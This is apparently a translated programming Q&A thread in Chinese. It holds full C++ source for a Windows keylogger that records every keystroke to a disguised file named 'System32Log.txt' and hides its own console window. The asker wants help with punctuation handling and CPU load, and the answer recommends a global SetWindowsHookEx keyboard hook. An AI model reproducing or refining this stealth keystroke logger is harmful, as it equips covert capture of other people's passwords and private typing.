我想在自己的电脑上制作一个小型键盘记录器,看看键盘如何与C ++一起使用。我已经在网上找到了一些代码,只是编辑了一下虽然我不知道怎么做我想做的事。
#include "stdafx.h"
#include <iostream>
#include <windows.h>
#include <winuser.h>
using namespace std;
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"System32Log.txt");
}
}
system ("PAUSE");
return 0;
}
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
我想修复它以正确存储“。”之类的内容。 “,”或更多,但我不确定,因为我不熟悉击键。另外我想添加一些能够减少CPU使用量的东西(目前我的i5只占25%),我应该使用Sleep(值),但我不确定要使用哪个值。
答案 0 :(得分:6)
快速查看答案here和here,了解有关哪些Windows API函数适合您的工作的更多信息。
基本思想是使用SetWindowsHookEx在键盘上设置一个所谓的“挂钩”功能(键盘或键盘_LL - 你可能想要第一个)。在卸载键盘记录器时,您需要将其取下钩子。设置挂钩后,Windows将在每个键盘事件后调用挂钩函数。您处理它(将其记录在某处),然后使用CAllNextHook调用下一个Hook以继续在Windows中处理该事件。你需要一些尝试和调试。
这是全局挂钩(第二个链接在MSDN中提供信息)。研究SetWindowsHookEx函数并尝试理解它背后的机制,你很快就会成功。您还可以在搜索中使用“hook”作为关键字来优化stackoverflow上的搜索(例如,阅读此here)